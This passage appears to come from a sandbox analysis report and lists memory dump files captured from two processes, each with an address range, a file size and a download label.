memory/1444-416-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-397-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-415-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-409-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-418-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-391-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-401-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-392-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-402-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-400-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-399-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-395-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-396-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-394-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-393-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-374-0x0000000000E00000-0x000000000256E000-memory.dmp

Filesize
23.4MB

Download
memory/1444-390-0x0000000000E00000-0x000000000256E000-memory.dmp

Filesize
23.4MB

Download
memory/1444-377-0x00000000770D8000-0x00000000770D9000-memory.dmp

Filesize
4KB

Download
memory/1444-376-0x0000000077051000-0x0000000077171000-memory.dmp

Filesize
1.1MB

Download
memory/1732-339-0x00000000056B0000-0x00000000056D2000-memory.dmp

Filesize
136KB

Download
memory/1732-375-0x0000000009000000-0x000000000A76E000-memory.dmp

Filesize
23.4MB

Download
memory/1732-373-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/1732-371-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/1732-372-0x0000000077051000-0x0000000077171000-memory.dmp

Filesize
1.1MB

Download
memory/1732-370-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/1732-368-0x0000000074630000-0x0000000074DE0000-memory.dmp

Filesize
7.7MB

Download
memory/1732-367-0x0000000009000000-0x000000000A76E000-memory.dmp

Filesize
23.4MB

Download
memory/1732-398-0x0000000074630000-0x0000000074DE0000-memory.dmp

Filesize
7.7MB

Download
memory/1732-366-0x0000000009000000-0x000000000A76E000-memory.dmp

Filesize
23.4MB

Download
memory/1732-365-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

Filesize
4KB

Download
memory/1732-359-0x0000000008A50000-0x0000000008FF4000-memory.dmp

Filesize
5.6MB

Download
memory/1732-358-0x0000000007810000-0x0000000007832000-memory.dmp

Filesize
136KB

Download
memory/1732-405-0x0000000009000000-0x000000000A76E000-memory.dmp

Filesize
23.4MB

Download
memory/1732-357-0x00000000078B0000-0x0000000007946000-memory.dmp

Filesize
600KB

Download
memory/1732-355-0x0000000007E20000-0x000000000849A000-memory.dmp

Filesize
6.5MB

Download
memory/1732-356-0x0000000006B20000-0x0000000006B3A000-memory.dmp

Filesize
104KB

Download
memory/1732-354-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/1732-353-0x0000000006640000-0x000000000668C000-memory.dmp

Filesize
304KB

Download
memory/1732-352-0x00000000065A0000-0x00000000065BE000-memory.dmp

Filesize
120KB

Download
memory/1732-351-0x0000000006010000-0x0000000006364000-memory.dmp

Filesize
3.3MB

Download
memory/1732-340-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/1732-341-0x0000000005830000-0x0000000005896000-memory.dmp

Filesize
408KB

Download
memory/1732-338-0x00000000059E0000-0x0000000006008000-memory.dmp

Filesize
6.2MB

Download
memory/1732-337-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download
memory/1732-334-0x0000000001590000-0x00000000015C6000-memory.dmp

Filesize
216KB

Download
memory/1732-335-0x0000000074630000-0x0000000074DE0000-memory.dmp

Filesize
7.7MB

Download
memory/1732-336-0x00000000013C0000-0x00000000013D0000-memory.dmp

Filesize
64KB

Download